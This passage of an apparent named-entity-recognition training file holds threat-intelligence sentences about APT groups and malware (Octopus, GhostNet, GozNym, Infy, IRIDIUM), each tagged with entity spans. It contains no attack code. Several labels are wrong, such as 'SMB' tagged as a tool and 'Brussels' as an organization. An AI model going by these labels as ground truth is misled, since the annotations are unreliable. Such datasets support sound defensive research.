"spans": {"TOOL: Android APKs": [[189, 201]]}, "info": {"id": "dnrti_train_001958", "source": "dnrti_train"}} {"text": "We named the actor DustSquad and have provided private intelligence reports to our customers on four of their 
campaigns involving custom Android and Windows malware .", "spans": {"THREAT_ACTOR: DustSquad": [[19, 28]], "TOOL: Windows malware": [[149, 164]]}, "info": {"id": "dnrti_train_001959", "source": "dnrti_train"}} {"text": "In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities .", "spans": {"TOOL: Octopus": [[65, 72]], "ORGANIZATION: diplomatic entities": [[93, 112]]}, "info": {"id": "dnrti_train_001960", "source": "dnrti_train"}} {"text": "We also started monitoring the malware and , using Kaspersky Attribution Engine based on similarity algorithms , discovered that Octopus is related to DustSquad , something we reported in April 2018 .", "spans": {"ORGANIZATION: Kaspersky": [[51, 60]], "TOOL: Octopus": [[129, 136]]}, "info": {"id": "dnrti_train_001961", "source": "dnrti_train"}} {"text": "From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194.126.10.18 , which appropriately enough is an Internet address based in Lebanon .", "spans": {}, "info": {"id": "dnrti_train_001962", "source": "dnrti_train"}} {"text": "Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "TOOL: Octopus Trojan": [[34, 48]]}, "info": {"id": "dnrti_train_001963", "source": "dnrti_train"}} {"text": "Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": {"ORGANIZATION: Political entities": [[0, 18]], "THREAT_ACTOR: IndigoZebra": [[102, 113]], "THREAT_ACTOR: Sofacy": [[116, 122]], "TOOL: Zebrocy malware": [[130, 145]], "TOOL: Octopus malware": [[186, 201]]}, "info": {"id": "dnrti_train_001964", "source": "dnrti_train"}} {"text": "El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here .", "spans": {"ORGANIZATION: Kaspersky": [[82, 91]]}, "info": 
{"id": "dnrti_train_001965", "source": "dnrti_train"}} {"text": "We've found that this group has continued to operate successfully , predominantly in Latin America , since 2014 .", "spans": {}, "info": {"id": "dnrti_train_001966", "source": "dnrti_train"}} {"text": "All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection .", "spans": {}, "info": {"id": "dnrti_train_001967", "source": "dnrti_train"}} {"text": "In the case of Octopus , DustSquad used Delphi as their programming language of choice , which is unusual for such an actor .", "spans": {"TOOL: Octopus": [[15, 22]]}, "info": {"id": "dnrti_train_001968", "source": "dnrti_train"}} {"text": "Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": {"ORGANIZATION: utility providers": [[102, 119]], "ORGANIZATION: embassies": [[155, 164]], "ORGANIZATION: government institutions": [[171, 194]]}, "info": {"id": "dnrti_train_001969", "source": "dnrti_train"}} {"text": "Some time ago , a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown , undetected malware .", "spans": {"ORGANIZATION: Kaspersky Lab": [[18, 31]]}, "info": {"id": "dnrti_train_001970", "source": "dnrti_train"}} {"text": "It was a targeted attack we are calling \" Machete \" .", "spans": {}, "info": {"id": "dnrti_train_001971", "source": "dnrti_train"}} {"text": "At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file .", "spans": {"TOOL: Java related application": [[36, 60]], "MALWARE: Java file": [[148, 157]]}, "info": {"id": "dnrti_train_001972", "source": "dnrti_train"}} {"text": 
"\" Machete \" is a targeted attack campaign with Spanish speaking roots .", "spans": {}, "info": {"id": "dnrti_train_001973", "source": "dnrti_train"}} {"text": "The decoy slideshows all contain photos from very meaningful events to individuals in Thailand , suggesting that the actors continually look for impactful events to use to disguise their attacks .", "spans": {"TOOL: decoy slideshows": [[4, 20]]}, "info": {"id": "dnrti_train_001974", "source": "dnrti_train"}} {"text": "In some cases , such as Russia , the target appears to be an embassy from one of the countries of this list .", "spans": {"ORGANIZATION: embassy": [[61, 68]]}, "info": {"id": "dnrti_train_001975", "source": "dnrti_train"}} {"text": "Both attackers and victims speak Spanish natively , as we see it consistently in the source code of the client side and in the Python code .", "spans": {}, "info": {"id": "dnrti_train_001976", "source": "dnrti_train"}} {"text": "We are also grateful to the Private Office of his Holiness the Dalai Lama , the Tibetan Government-in-Exile , the missions of Tibet in London , Brussels , and New York , and Drewla ( a Tibetan NGO ) .", "spans": {"ORGANIZATION: Tibet": [[126, 131]], "ORGANIZATION: Brussels": [[144, 152]], "ORGANIZATION: Drewla": [[174, 180]], "ORGANIZATION: Tibetan": [[185, 192]]}, "info": {"id": "dnrti_train_001977", "source": "dnrti_train"}} {"text": "Between June 2008 and March 2009 the Information Warfare Monitor conducted an extensive and exhaustive two-phase investigation focused on allegations of Chinese cyber espionage against the Tibetan community .", "spans": {"ORGANIZATION: Tibetan community": [[189, 206]]}, "info": {"id": "dnrti_train_001978", "source": "dnrti_train"}} {"text": "These instances of Gh0st RAT are consistently controlled from commercial Internet access accounts located on the island of Hainan , People's Republic of China .", "spans": {"TOOL: Gh0st RAT": [[19, 28]]}, "info": {"id": "dnrti_train_001979", "source": "dnrti_train"}} 
{"text": "The fieldwork generated extensive data that allowed us to examine Tibetan information security practices , as well as capture real-time evidence of malware that had penetrated Tibetan computer systems .", "spans": {"ORGANIZATION: Tibetan information security practices": [[66, 104]], "ORGANIZATION: Tibetan": [[176, 183]]}, "info": {"id": "dnrti_train_001980", "source": "dnrti_train"}} {"text": "It is therefore possible that the large percentage of high value targets identified in our analysis of the GhostNet are coincidental , spread by contact between individuals who previously communicated through e-mail .", "spans": {}, "info": {"id": "dnrti_train_001981", "source": "dnrti_train"}} {"text": "Where they exist , they often use grey market or pirated software .", "spans": {"TOOL: grey market": [[34, 45]], "TOOL: pirated software": [[49, 65]]}, "info": {"id": "dnrti_train_001982", "source": "dnrti_train"}} {"text": "Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer .", "spans": {"MALWARE: documents": [[72, 81]]}, "info": {"id": "dnrti_train_001983", "source": "dnrti_train"}} {"text": "GhostNet represents a network of compromised computers resident in high-value political , economic , and media locations spread across numerous countries worldwide .", "spans": {}, "info": {"id": "dnrti_train_001984", "source": "dnrti_train"}} {"text": "After that , the attacker is capable to control the compromised device .", "spans": {}, "info": {"id": "dnrti_train_001985", "source": "dnrti_train"}} {"text": "The computers of diplomats , military attachés , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) .", "spans": {"ORGANIZATION: diplomats": [[17, 26]], "ORGANIZATION: military attachés": [[29, 46]], 
"ORGANIZATION: private assistants": [[49, 67]], "ORGANIZATION: secretaries": [[70, 81]], "ORGANIZATION: Prime Ministers": [[85, 100]], "ORGANIZATION: journalists": [[103, 114]]}, "info": {"id": "dnrti_train_001986", "source": "dnrti_train"}} {"text": "The C&C server ( 82.137.255.56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 .", "spans": {"THREAT_ACTOR: Goldmouse": [[84, 93]]}, "info": {"id": "dnrti_train_001987", "source": "dnrti_train"}} {"text": "According to 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor .", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[13, 43]], "TOOL: njRAT backdoor": [[92, 106]]}, "info": {"id": "dnrti_train_001988", "source": "dnrti_train"}} {"text": "The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": {"TOOL: GozNym": [[20, 26]], "ORGANIZATION: banking customers": [[152, 169]]}, "info": {"id": "dnrti_train_001989", "source": "dnrti_train"}} {"text": "The APT group is reportedly targeting the Middle East region .", "spans": {}, "info": {"id": "dnrti_train_001990", "source": "dnrti_train"}} {"text": "The malware has started targeting corporate , SMB , investment banking and consumer accounts at banks , including some in Portugal and the U.S. 
, in addition to Poland , according to researchers at IBM 's X-Force team .", "spans": {"TOOL: SMB": [[46, 49]], "ORGANIZATION: IBM 's X-Force": [[198, 212]]}, "info": {"id": "dnrti_train_001991", "source": "dnrti_train"}} {"text": "According to Kessem the malware has redirection instructions for 17 banks , and features an additional 230 URLs to assist attackers in targeting community banks and email service providers in Poland .", "spans": {"ORGANIZATION: Kessem": [[13, 19]], "ORGANIZATION: email service providers": [[165, 188]]}, "info": {"id": "dnrti_train_001992", "source": "dnrti_train"}} {"text": "With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate .", "spans": {"TOOL: GozNym": [[5, 11]], "TOOL: URL": [[70, 73]], "TOOL: SSL certificate": [[78, 93]]}, "info": {"id": "dnrti_train_001993", "source": "dnrti_train"}} {"text": "Fresh from targeting banks in Poland , the banking Trojan GozNym has begun taking aim at banks in Germany .", "spans": {"TOOL: banking Trojan": [[43, 57]], "TOOL: GozNym": [[58, 64]]}, "info": {"id": "dnrti_train_001994", "source": "dnrti_train"}} {"text": "Attackers went on to use the Trojan to steal $4 million from 24 banks , including 22 in the United States and two in Canada , in just two weeks .", "spans": {}, "info": {"id": "dnrti_train_001995", "source": "dnrti_train"}} {"text": "Recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the GozNym group appears up to the task .", "spans": {"ORGANIZATION: Kessem": [[72, 78]]}, "info": {"id": "dnrti_train_001996", "source": "dnrti_train"}} {"text": "The malware is distributed primarily through laced spam emails that lure recipients into opening attachments .", "spans": {}, "info": {"id": "dnrti_train_001997", "source": "dnrti_train"}} {"text": "Fresh from targeting banks in Poland , the banking Trojan has reportedly begun taking aim at banks in Germany .", "spans": {"TOOL: banking Trojan": [[43, 57]]}, "info": {"id": 
"dnrti_train_001999", "source": "dnrti_train"}} {"text": "Now GozNym is now targeting 13 banks and subsidiaries in Germany , Limor Kessem , Executive Security Advisor at IBM , said Tuesday .", "spans": {"TOOL: GozNym": [[4, 10]], "ORGANIZATION: subsidiaries": [[41, 53]], "ORGANIZATION: Kessem": [[73, 79]], "ORGANIZATION: Executive Security": [[82, 100]], "ORGANIZATION: IBM": [[112, 115]]}, "info": {"id": "dnrti_train_002000", "source": "dnrti_train"}} {"text": "he Trojan , a hybrid of Nymaim and Gozi malware , initially formed in April and thrives on carrying out redirection attacks via DNS poisoning .", "spans": {"TOOL: Nymaim": [[24, 30]], "TOOL: Gozi malware": [[35, 47]]}, "info": {"id": "dnrti_train_002001", "source": "dnrti_train"}} {"text": "In April , shortly after the Trojan 's discovery , researchers observed a massive GozNym campaign targeting 24 North American banks .", "spans": {}, "info": {"id": "dnrti_train_002002", "source": "dnrti_train"}} {"text": "The method , which technically redirects users through local DNS poisoning , requires a fair bit of work ; recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the group behind GozNym – Nymaim – appear up to the task .", "spans": {"ORGANIZATION: Kessem": [[179, 185]], "TOOL: GozNym": [[210, 216]]}, "info": {"id": "dnrti_train_002003", "source": "dnrti_train"}} {"text": "Attackers behind Dyre have used similar tactics in the past but have only deployed their attacks in English speaking countries and Spain .", "spans": {}, "info": {"id": "dnrti_train_002004", "source": "dnrti_train"}} {"text": "When we last heard from the Trojan , its operators were seen launching redirection attacks on four large , U.S. 
banks in June .", "spans": {"TOOL: Trojan": [[28, 34]]}, "info": {"id": "dnrti_train_002005", "source": "dnrti_train"}} {"text": "The fact that the cybercriminals behind GozNym have already adapted the Trojan for three different languages and in countries which have different banking systems is unique , according to Kessem .", "spans": {"TOOL: GozNym": [[40, 46]], "ORGANIZATION: Kessem": [[188, 194]]}, "info": {"id": "dnrti_train_002006", "source": "dnrti_train"}} {"text": "By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country .", "spans": {"TOOL: GozNym": [[22, 28]], "ORGANIZATION: email service providers": [[189, 212]]}, "info": {"id": "dnrti_train_002007", "source": "dnrti_train"}} {"text": "Seeking to tease out any possible links between Operation Aurora , VOHO , Operation DeputyDog , and Ephemeral Hydra , we began with Symantec 's Hidden Lynx report as our foundation .", "spans": {"ORGANIZATION: Symantec": [[132, 140]]}, "info": {"id": "dnrti_train_002008", "source": "dnrti_train"}} {"text": "The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": {"TOOL: Trojan.Naid": [[106, 117]], "MALWARE: Backdoor.Moudoor": [[120, 136]], "TOOL: Backdoor.Hikit": [[143, 157]]}, "info": {"id": "dnrti_train_002009", "source": "dnrti_train"}} {"text": "We will detail how the C&C infrastructure and tools used by hacker group Hidden Lynx during its VOHO campaign ( 2012 ) , excellently documented by Symantec researchers last September , overlap with tools used in other high profile operations during the past few years .", "spans": {"THREAT_ACTOR: Hidden Lynx": [[73, 84]], "ORGANIZATION: Symantec": [[147, 155]]}, "info": {"id": "dnrti_train_002010", "source": "dnrti_train"}} 
{"text": "When the New York Times and Mandiant last year unmasked a large scale Chinese hacking operation , pinpointing its location down to the building , the report drew mainstream attention to what security professionals already well knew : sophisticated threat actors carry out persistent cyber operations over months and years .", "spans": {"ORGANIZATION: New York Times": [[9, 23]], "ORGANIZATION: Mandiant": [[28, 36]]}, "info": {"id": "dnrti_train_002011", "source": "dnrti_train"}} {"text": "Using Recorded Future , we quickly built a timeline of the reported use of those tools in major security incidents , finding many events prior to the early 2013 exposé on Hidden Lynx .", "spans": {"THREAT_ACTOR: Hidden Lynx": [[171, 182]]}, "info": {"id": "dnrti_train_002013", "source": "dnrti_train"}} {"text": "In particular , FireEye during the fall of 2013 called out infrastructure overlap between Ephemeral Hydra and DeputyDog .", "spans": {"ORGANIZATION: FireEye": [[16, 23]], "TOOL: DeputyDog": [[110, 119]]}, "info": {"id": "dnrti_train_002014", "source": "dnrti_train"}} {"text": "The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": {"TOOL: Trojan.Naid": [[105, 116]], "MALWARE: Backdoor.Moudoor": [[119, 135]], "TOOL: Backdoor.Hikit": [[142, 156]]}, "info": {"id": "dnrti_train_002015", "source": "dnrti_train"}} {"text": "Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "TOOL: Trojan.Naid": [[72, 83]], "MALWARE: Backdoor.Moudoor": [[88, 104]], "TOOL: Aurora": [[123, 129]], "THREAT_ACTOR: Elderwood Gang": [[139, 153]], "THREAT_ACTOR: Hidden Lynx": [[163, 174]]}, "info": {"id": "dnrti_train_002016", "source": "dnrti_train"}} {"text": "In addition to these , we also identified \" Macfog 
\" , a native Mac OS X implementation of Icefog that infected several hundred victims worldwide .", "spans": {"TOOL: Macfog": [[44, 50]], "TOOL: native Mac OS X implementation": [[57, 87]], "TOOL: Icefog": [[91, 97]]}, "info": {"id": "dnrti_train_002017", "source": "dnrti_train"}} {"text": "Icefog , also known as the \" Dagger Panda \" by Crowdstrike 's naming convention , infected targets mainly in South Korea and Japan .", "spans": {"THREAT_ACTOR: Icefog": [[0, 6]], "THREAT_ACTOR: Dagger Panda": [[29, 41]], "ORGANIZATION: Crowdstrike": [[47, 58]]}, "info": {"id": "dnrti_train_002018", "source": "dnrti_train"}} {"text": "In 2013 , a public report reveals a group of actors conducted targeted attacks leverage a malware dubbed ICEFOG against mainly government organizations and defense industry of South Korea and Japan .", "spans": {"TOOL: ICEFOG": [[105, 111]], "ORGANIZATION: government organizations": [[127, 151]]}, "info": {"id": "dnrti_train_002019", "source": "dnrti_train"}} {"text": "Similar to our approach with Symantec 's report on Hidden Lynx , we used Recorded Future to organize the technical details about the DeputyDog attacks to reveal technical information described in the open source reporting across multiple campaigns .", "spans": {"ORGANIZATION: Symantec": [[29, 37]]}, "info": {"id": "dnrti_train_002020", "source": "dnrti_train"}} {"text": "With Javafog , we are turning yet another page in the Icefog story by discovering another generation of backdoors used by the attackers .", "spans": {"TOOL: Icefog": [[54, 60]]}, "info": {"id": "dnrti_train_002021", "source": "dnrti_train"}} {"text": "Since January 2013 , we've been on the lookout for a possible RedOctober comeback .", "spans": {"THREAT_ACTOR: RedOctober": [[62, 72]]}, "info": {"id": "dnrti_train_002022", "source": "dnrti_train"}} {"text": "One possible hit was triggered when we observed Mevade , an unusual piece of malware that appeared late in 2013 .", "spans": {}, "info": {"id": 
"dnrti_train_002023", "source": "dnrti_train"}} {"text": "In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware .", "spans": {"VULNERABILITY: CVE-2012-0158": [[81, 94]]}, "info": {"id": "dnrti_train_002024", "source": "dnrti_train"}} {"text": "It wasn't until August 2014 that we observed something which made us wonder if RedOctober is back for good .", "spans": {}, "info": {"id": "dnrti_train_002025", "source": "dnrti_train"}} {"text": "The Cloud Atlas implants utilize a rather unusual C&C mechanism .", "spans": {}, "info": {"id": "dnrti_train_002026", "source": "dnrti_train"}} {"text": "We named it RedOctober because we started this investigation in October 2012 , an unusually hot month .", "spans": {}, "info": {"id": "dnrti_train_002027", "source": "dnrti_train"}} {"text": "The attackers upload data to the account , which is downloaded by the implant , decrypted and interpreted .", "spans": {}, "info": {"id": "dnrti_train_002028", "source": "dnrti_train"}} {"text": "Just like with RedOctober , the top target of Cloud Atlas is Russia , followed closely by Kazakhstan , according to data from the Kaspersky Security Network ( KSN ) .", "spans": {"THREAT_ACTOR: RedOctober": [[15, 25]], "ORGANIZATION: Kaspersky Security Network": [[130, 156]], "ORGANIZATION: KSN": [[159, 162]]}, "info": {"id": "dnrti_train_002029", "source": "dnrti_train"}} {"text": "In May 2015 , Palo Alto Networks WildFire detected two e-mails carrying malicious documents from a genuine and compromised Israeli Gmail account , sent to an Israeli industrial organization .", "spans": {"ORGANIZATION: Palo Alto Networks WildFire": [[14, 41]], "ORGANIZATION: industrial organization": [[166, 189]]}, "info": {"id": "dnrti_train_002030", "source": "dnrti_train"}} {"text": "One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" .", "spans": 
{"MALWARE: Microsoft PowerPoint file": [[21, 46]], "MALWARE: thanks.pps": [[55, 65]], "MALWARE: Microsoft Word document": [[97, 120]], "MALWARE: request.docx": [[129, 141]]}, "info": {"id": "dnrti_train_002031", "source": "dnrti_train"}} {"text": "Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient .", "spans": {"ORGANIZATION: WildFire": [[23, 31]], "MALWARE: Word document": [[69, 82], [140, 153]], "MALWARE: hello.docx": [[87, 97]]}, "info": {"id": "dnrti_train_002032", "source": "dnrti_train"}} {"text": "Attacks using this tool were still active as of April 2016 .", "spans": {}, "info": {"id": "dnrti_train_002033", "source": "dnrti_train"}} {"text": "Considering the language being used in the malicious code is Arabic , it seems that the attacker is familiar with Arabic language as well .", "spans": {}, "info": {"id": "dnrti_train_002034", "source": "dnrti_train"}} {"text": "The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll .", "spans": {"MALWARE: thanks.pps": [[25, 35]], "MALWARE: ins8376.exe": [[99, 110]], "MALWARE: mpro324.dll": [[143, 154]]}, "info": {"id": "dnrti_train_002035", "source": "dnrti_train"}} {"text": "In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 .", "spans": {"MALWARE: Cyberlink": [[49, 58]]}, "info": {"id": "dnrti_train_002036", "source": "dnrti_train"}} {"text": "Unit 42 published a blog at the beginning of May titled \" Prince of Persia \" , in which we described the discovery of a decade-long campaign using a formerly unknown malware family , Infy , that targeted government and industry interests worldwide .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: Infy": [[183, 
187]]}, "info": {"id": "dnrti_train_002037", "source": "dnrti_train"}} {"text": "We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": {"ORGANIZATION: citizens": [[71, 79]]}, "info": {"id": "dnrti_train_002038", "source": "dnrti_train"}} {"text": "In addition to the original \" Infy \" variant , we also see the newer , more sophisticated , interactive , and fuller-featured \" Infy M \" variant deployed against apparently-higher-value targets .", "spans": {"TOOL: Infy": [[30, 34]], "TOOL: Infy M": [[128, 134]]}, "info": {"id": "dnrti_train_002039", "source": "dnrti_train"}} {"text": "This documentation provides new insight into intrusion efforts conducted by at least four discrete Iranian threat actors , Rocket Kitten , Infy , Sima , and Operation Cleaver , including groups and tools that have not been previously disclosed .", "spans": {"THREAT_ACTOR: Rocket Kitten": [[123, 136]], "THREAT_ACTOR: Infy": [[139, 143]], "THREAT_ACTOR: Sima": [[146, 150]]}, "info": {"id": "dnrti_train_002040", "source": "dnrti_train"}} {"text": "Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": {"ORGANIZATION: activists": [[160, 169]]}, "info": {"id": "dnrti_train_002041", "source": "dnrti_train"}} {"text": "Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": {"ORGANIZATION: human rights organizations": [[87, 113]], "ORGANIZATION: diaspora": [[243, 251]]}, "info": {"id": "dnrti_train_002042", "source": "dnrti_train"}} {"text": "Thanks to information we have 
been able to collect during the course of our research , such as characteristics of the group 's malware and development cycle , our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state .", "spans": {"THREAT_ACTOR: Infy": [[209, 213]]}, "info": {"id": "dnrti_train_002043", "source": "dnrti_train"}} {"text": "Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran .", "spans": {}, "info": {"id": "dnrti_train_002044", "source": "dnrti_train"}} {"text": "Until the publication of the Palo Alto report , the developers of the Infy appeared to be actively updating and maintaining the codebase , and new releases were distributed to existing , as well as new , targets quite regularly .", "spans": {"ORGANIZATION: Palo Alto": [[29, 38]], "TOOL: Infy": [[70, 74]]}, "info": {"id": "dnrti_train_002045", "source": "dnrti_train"}} {"text": "Other samples were found bearing a compilation time as early as June 2012 and version 00002 .", "spans": {}, "info": {"id": "dnrti_train_002046", "source": "dnrti_train"}} {"text": "Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": {"ORGANIZATION: Iranians": [[58, 66]]}, "info": {"id": "dnrti_train_002047", "source": "dnrti_train"}} {"text": "When activities targeting of civil society subsided , the actors instead appeared to have focused on external targets , such a series of attempts to spearphish the Danish Ministry of Foreign Affairs .", "spans": {}, "info": {"id": "dnrti_train_002048", "source": "dnrti_train"}} {"text": "Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing 
functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials .", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "TOOL: Infy": [[190, 194], [242, 246]], "TOOL: Infy M.": [[199, 206]], "TOOL: malware": [[257, 264]], "TOOL: keylogger": [[298, 307]]}, "info": {"id": "dnrti_train_002049", "source": "dnrti_train"}} {"text": "Our observation of Infy 's campaigns , primarily through the lens of spearphishing attacks against Iranian civil society and media organizations , indicates a wandering focus on particular demographics on a strategic basis over time .", "spans": {"ORGANIZATION: media organizations": [[125, 144]]}, "info": {"id": "dnrti_train_002050", "source": "dnrti_train"}} {"text": "The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": {"TOOL: Infy malware": [[4, 16]], "ORGANIZATION: Iranians": [[36, 44]], "ORGANIZATION: broadcast journalist": [[124, 144]], "TOOL: PowerPoint": [[194, 204]]}, "info": {"id": "dnrti_train_002051", "source": "dnrti_train"}} {"text": "Based on information collected in the course of this research , the targets and victims of Infy 's campaigns have continued to be strongly aligned with Iran 's \" soft war \" agenda , internal security policies , and regional adversaries of the hardline establishment of the Islamic Republic of Iran .", "spans": {}, "info": {"id": "dnrti_train_002052", "source": "dnrti_train"}} {"text": "Until late December 2015 , in nearly every Infy message documented since our tracking began in May 2013 , no attempt included strong tailoring of the approach , often not even including an email body , instead relying on cryptic filenames and email subjects to 
attract interest .", "spans": {"TOOL: Infy message": [[43, 55]]}, "info": {"id": "dnrti_train_002053", "source": "dnrti_train"}} {"text": "One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": {"ORGANIZATION: political activist": [[89, 107]], "ORGANIZATION: British-Iranian": [[185, 200]]}, "info": {"id": "dnrti_train_002054", "source": "dnrti_train"}} {"text": "As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": {"ORGANIZATION: Kurdish activists": [[121, 138]], "THREAT_ACTOR: Flying Kitten actor group": [[183, 208]]}, "info": {"id": "dnrti_train_002055", "source": "dnrti_train"}} {"text": "The actors successfully compromised a host of an Saudi government institutions on January 17 , 2016 , and maintained access for at least two weeks .", "spans": {"ORGANIZATION: government institutions": [[55, 78]]}, "info": {"id": "dnrti_train_002056", "source": "dnrti_train"}} {"text": "The Infy group also appears to engage in espionage activities against foreign governments and businesses .", "spans": {"THREAT_ACTOR: Infy group": [[4, 14]]}, "info": {"id": "dnrti_train_002057", "source": "dnrti_train"}} {"text": "In order to initially compromise the designated targets , Infy typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": {"TOOL: Infy": [[137, 141]]}, "info": {"id": "dnrti_train_002058", "source": "dnrti_train"}} {"text": "In order to initially compromise the designated targets , the attackers typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks 
.", "spans": {"TOOL: Infy": [[146, 150]]}, "info": {"id": "dnrti_train_002059", "source": "dnrti_train"}} {"text": "On May 2 , 2016 , Palo Alto Networks published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": {"ORGANIZATION: Palo Alto Networks": [[18, 36]], "THREAT_ACTOR: Infy": [[147, 151]]}, "info": {"id": "dnrti_train_002060", "source": "dnrti_train"}} {"text": "Prior to the distribution of new versions of the agent , the Infy developers appear to consistently conduct tests from local hosts , which indicates that the control and maintenance of the software occurs in the Khorasan Razavi province of Iran , potentially in the city of Mashhad .", "spans": {"TOOL: Infy": [[61, 65]]}, "info": {"id": "dnrti_train_002061", "source": "dnrti_train"}} {"text": "On May 2 , 2016 , Palo Alto published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": {"ORGANIZATION: Palo Alto": [[18, 27]]}, "info": {"id": "dnrti_train_002062", "source": "dnrti_train"}} {"text": "Only one client , based in Iran , continued to communicate with the infrastructure .", "spans": {}, "info": {"id": "dnrti_train_002063", "source": "dnrti_train"}} {"text": "A researcher has attributed a recently publicized attack on Citrix' internal network to the Iranian-linked group known as IRIDIUM – and said that the data heist involved 6 terabytes of sensitive data .", "spans": {"ORGANIZATION: Citrix'": [[60, 67]]}, "info": {"id": "dnrti_train_002064", "source": "dnrti_train"}} {"text": "\" IRIDIUM has hit more than 200 government agencies , oil and gas companies and technology companies , including Citrix Systems Inc \" , they 
said .", "spans": {"ORGANIZATION: government agencies": [[32, 51]], "ORGANIZATION: gas companies": [[62, 75]], "ORGANIZATION: technology companies": [[80, 100]], "ORGANIZATION: Citrix Systems Inc": [[113, 131]]}, "info": {"id": "dnrti_train_002065", "source": "dnrti_train"}} {"text": "Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week – but it wouldn't confirm the other details in Resecurity 's post , including the attribution .", "spans": {"ORGANIZATION: Citrix": [[0, 6]], "ORGANIZATION: Resecurity": [[154, 164]]}, "info": {"id": "dnrti_train_002066", "source": "dnrti_train"}} {"text": "In wake of these events , a security firm Resecurity reached out to NBC news and claimed that they had reasons to believe that the attacks were carried out by Iranian-linked group known as IRIDIUM .", "spans": {"ORGANIZATION: security firm": [[28, 41]], "ORGANIZATION: Resecurity": [[42, 52]]}, "info": {"id": "dnrti_train_002067", "source": "dnrti_train"}} {"text": "Resecurity says that IRIDIUM \" has hit more than 200 government agencies , oil and gas companies , and technology companies including Citrix .", "spans": {"ORGANIZATION: Resecurity": [[0, 10]], "ORGANIZATION: government agencies": [[53, 72]], "ORGANIZATION: gas companies": [[83, 96]], "ORGANIZATION: technology companies": [[103, 123]], "ORGANIZATION: Citrix": [[134, 140]]}, "info": {"id": "dnrti_train_002068", "source": "dnrti_train"}} {"text": "Resecurity claims that IRIDIUM breached Citrix 's network during December 2018 .", "spans": {"ORGANIZATION: Resecurity": [[0, 10]], "ORGANIZATION: Citrix": [[40, 46]]}, "info": {"id": "dnrti_train_002069", "source": "dnrti_train"}} {"text": "Infy engaged in malware spearphishing against the same targets as Flying Kitten from the outset of its campaign ; Operation Cleaver has registered several resources related to development agencies that have been the subject of intrusion attempts by others since February 2014 .", 
